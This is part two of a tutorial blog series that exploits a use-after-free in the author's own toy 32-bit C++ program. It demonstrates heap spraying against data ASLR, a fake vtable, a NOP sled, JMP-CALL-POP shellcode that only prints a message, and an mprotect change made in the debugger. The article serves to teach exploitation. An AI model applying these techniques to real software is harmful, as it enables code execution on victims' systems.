Anatomy of a Modern Memory Corruption Exploit - Part II

Sun 09 April 2023

This is part two of a series of articles. Here is part one.

Step 2: Calling a pre-defined routine in the victim with ASLR enabled

In step 1 in the first article of this series we had disabled ASLR in order to have the buffer for the decoded third chunk at a fixed address. Now we will raise the bar for the exploit by enabling ASLR for data, that is for memory on the stack and heap. We will keep ASLR disabled for code (by preventing GCC from creating a position-independent executable (PIE) with the -Wl,-no-pie compiler flag), so our routine pwned_destructor still lives at a fixed address.

So how can we defeat ASLR? We somehow need to find out the address of the third chunk’s buffer (because it contains the fake vtable), despite it being a random value now that differs from one invocation of the victim program to the other. We are helped here by the fact that we have a 32-bit program on our hands. As it turns out, with the somewhat limited address space of 32-bit programs (4GB), there are not that many addresses for the kernel to choose from, especially for large memory blocks. The plot below shows the address ranges (start and end addresses of the memory blocks) for different block sizes as obtained by repeated invocations of a program that just calls malloc.

malloc address ranges
Figure 1. Address ranges returned by malloc by allocation size (with 14 random bits for mmap)

As you can see, if we allocate large enough blocks (100MB in the figure), all address ranges overlap to some extent. This means there is an address range that is guaranteed to be included in each and every memory block we allocate. The actual size threshold above which this is the case depends on a kernel parameter (/proc/sys/vm/mmap_rnd_compat_bits), which tells the kernel how many random bits it should use for the mmap system call (mmap is used internally by malloc for large allocations). The default seems to be 8 bits (see this article for more details), with this value a memory block of a size of 100MB always gets allocated at the same address. To make things more interesting, I cranked up the value to 14 bits. With that value you get the behavior shown in the figure.

So how does this knowledge help us with the exploit? We would need a large memory allocation (e. g. 100MB) to happen in the program and our fake vtable to be located at an address that is always included in the allocated memory block. This is actually quite easy to accomplish. In the previous step we put just one copy of the vtable in the third chunk. But we can make the third chunk much larger and put lots of copies of the vtable in it. Then we no longer use the start address (which changes) of the buffer for the chunk’s data but an address somewhere in the middle (which stays the same) of this buffer as pointer to the vtable, or to be more precise, to one copy of it. Because the buffer is located on the heap and we sort of "spray" data onto it, this technique is called heap spraying. However, it is, as described here, only possible with 32-bit programs. Due to their much larger address spaces (256 TB), with 64-bit programs it’s in general not possible to allocate memory blocks large enough to get overlapping address ranges. For them, this technique must be combined with a way to find out the program’s address space layout (at least partially), but this is beyond the scope of this series of articles. If I made you curious now, you can read more about this here for example.

How a heap spray looks like in reality is shown in the debugger session below. We take a closer look at the first HTTPChunk object (which got overwritten) right before it’s about to be deleted.

Listing 1. Demo of the heap spraying
Breakpoint 1, main () at ./uaf-overwrite-vtable.cpp:179
177             delete p_chunk;

pwndbg> x/3dx p_chunk
0x98a3c40:      0xe9000000      0x78787878      0x78787878  (1)
pwndbg> x/16dx 0xe9000000
0xe66a9010:     0x0804a3dd      0x0804a3dd      0x0804a3dd      0x0804a3dd  (2)
0xe66a9020:     0x0804a3dd      0x0804a3dd      0x0804a3dd      0x0804a3dd
0xe66a9020:     0x0804a3dd      0x0804a3dd      0x0804a3dd      0x0804a3dd
0xe66a9020:     0x0804a3dd      0x0804a3dd      0x0804a3dd      0x0804a3dd
pwndbg> i sym 0x0804a3dd  (3)
pwned_destructor() in section .text of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable

We can see (1) that the object’s pointer to its vtable now points to the address 0xe9000000. If we inspect the memory at this address we see (2) that it indeed contains pointers to the pwned_destructor routine (3), which make up the vtable. So where does this magic value 0xe9000000 come from? I found it by running the program a few times and choosing a value that was always included in the buffer for the third chunk (somewhere in the middle of it). It only needs to be aligned on a double-word address, then it’s bound to hit a vtable.

Step 3: Injecting the malicious code into the victim

So far, we haven’t injected any code (that we would control) into the program but used a routine already contained in the program. As I have mentioned, this is normally not a realistic scenario. So we will now ditch the routine and see how we can inject our own code.

First off, the injected code must of course be self-contained and position-independent, that is it must be able to run from any location in memory and must not rely on anything other than system calls. This type of code is usually known as shellcode. The shellcode we will use looks like this:

Listing 2. Our shellcode
.code32
jmp     l_data
l_code:
mov     ebx, 2      # file descriptor, 2 = stderr
pop     ecx         # pointer to buffer
mov     edx, 30     # buffer size
mov     eax, 4      # system call number, 4 = write
int     0x80        # invoke system call
ret

l_data:
call    l_code      # call to push the string's address onto the stack
.asciz  "\x1b[31mYou've been pwned!!!\x1b[0m\n"

The term shellcode is actually a bit misleading here as we don’t start a shell but just print a string. As you can see, the code is quite simple. First, it performs the JMP-CALL-POP trick to get the address of the string we want to print on the stack, then it invokes the write system call and returns (because it will be called as a method via the vtable). I translated the code into a raw binary (just the code, no headers and other stuff) using GNU as and objdump so that the Python script that performs the exploit can use it.

So how are we going to deliver this code to the victim program? We will use another chunk for that. But we need to find again a way to use a fixed start address (that we will put into the vtable), despite the start address of the chunk’s buffer being random. As you might have guessed, the heap spraying, described in the previous step, comes to the rescue once more. But instead of putting lots of copies of our code into the chunk (as we did with the vtable), we will use a technique known as NOP slide (or NOP sled). You might be familiar with this technique if you know a bit about classical stack overflows. What it means is that we will create a large chunk (again 100MB), fill it almost completely with NOP instructions and put our shellcode at the very end of it. Then we will use an address that is guaranteed to be included in the chunk’s buffer as pointer to our code and put that address in our fake vtable. This address will definitely point to a NOP and when the CPU finally jumps to it, program execution will "slide" down the NOPs until it reaches the shellcode. Note that we don’t care about null bytes in the shellcode as we don’t deliver it as string but as base64-encoded data.

In the following debugger session we will take a closer look at this fourth chunk containing the code.

Listing 3. Demo of the code injection
Breakpoint 1, main () at ./uaf-overwrite-vtable.cpp:179
177             delete p_chunk;

pwndbg> x/3dx p_chunk
0x8effc40:      0xe2000000      0x78787878      0x78787878  (1)
pwndbg> x/8dx 0xe2000000
0xe2000000:     0xdbc00000      0xdbc00000      0xdbc00000      0xdbc00000  (2)
0xe2000010:     0xdbc00000      0xdbc00000      0xdbc00000      0xdbc00000
pwndbg> x/8bx 0xdbc00000
0xdbc00000:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
pwndbg> x/8i 0xdbc00000
   0xdbc00000:  nop  (3)
   0xdbc00001:  nop
   0xdbc00002:  nop
   0xdbc00003:  nop
   0xdbc00004:  nop
   0xdbc00005:  nop
   0xdbc00006:  nop
   0xdbc00007:  nop
pwndbg> x/12i (0xd9b52010 + 0x6400000 - 60)
   0xdff51fd4:  nop
   0xdff51fd5:  nop
   0xdff51fd6:  nop
   0xdff51fd7:  jmp    0xdff51fec  (4)
   0xdff51fd9:  mov    ebx,0x1
   0xdff51fde:  pop    ecx
   0xdff51fdf:  mov    edx,0x1e
   0xdff51fe4:  mov    eax,0x4
   0xdff51fe9:  int    0x80
   0xdff51feb:  ret
   0xdff51fec:  call   0xdff51fd9
   0xdff51ff1:  sbb    ebx,DWORD PTR [ebx+0x33]
pwndbg> x/1s 0xdff51ff1
0xdff51ff1:     "\033[31mYou've been pwned!!!\033[0m\n"  (5)

But before we do that we note that our overwritten object still contains a pointer to the chunk containing our fake vtables (1), although with a different value than before (0xe2000000 instead of 0xe9000000). And of course the vtable looks different now as well. It contains pointers with the value 0xdbc00000 (2). So what is there at this address? If we display the memory as instruction (3) we see lots of NOPs. So it seems the address is somewhere located in the buffer for the decoded fourth chunk, in the NOP slide. If we examine the end of this buffer (0xd9b52010 is the start address of the buffer, conveniently printed out by the program) we find our shellcode (4) together with the string it prints (5).

I arrived at these two addresses (0xe2000000 and 0xdbc00000) again by running the program a few times and choosing values that were always included in the respective buffers. Interestingly, the buffer for the fourth chunk was always located 100MB below the buffer for the third chunk. The following diagram shows the locations of the chunk’s buffers in memory and their relation (what points to what).

chunk buffers
Figure 2. Location of the chunk buffers in memory and their relation

So when the destructor is finally called on the overwritten object, via the pointer in the vtable, the CPU will jump right into the NOP slide, execute all the NOPs until it reaches the shellcode and then the shellcode itself.

Except…​ it doesn’t, not yet at least. Instead, the program terminates with a segmentation fault. Why is that? Another security measure employed by modern CPUs and operating systems keeps us from succeeding. It is commonly known as data execution prevention (DEP) or W^X and means that any memory regions that are writeable by a program (on the heap or stack) are by default not executable (implemented via the NX bit). As the chunk’s buffer is of course writeable, the CPU will not execute the code in it but generate an exception which leads in turn to the segmentation fault.

So how can we get around this security measure? In the third part of this series I will show you a very clever technique that works by not injecting code into the program but something else. But for now, we will just play a bit unfair and change the permissions of the chunk’s buffer. This can be done very easily in the debugger as you can see below.

Listing 4. Changing the permissions of the chunk’s buffer
pwndbg> vmmap 0xd9b52010  (1)
     Start        End Perm     Size Offset File
0xd9b52000 0xf6e00000 rw-p 1d2ae000      0 [anon_d9b52] +0x0
pwndbg> call (long) mprotect(0xd9b52000, 0x1d2ae000, 0x7)  (2)
$4 = 0

First I use the vmmap command (provided by the pwndbg extension) to check the permissions of the buffer (1) and you can see that it’s indeed not executable (it misses the "x" bit). Then I call the mprotect system call (2) to change the permissions (I don’t use the start address and size of the buffer but of the complete memory mapping, 0x7 means "rwx"). After that the exploit actually works.

This is the end of the second article in this series. As I already said we will defeat W^X in the third article. Stay tuned if you liked it so far…​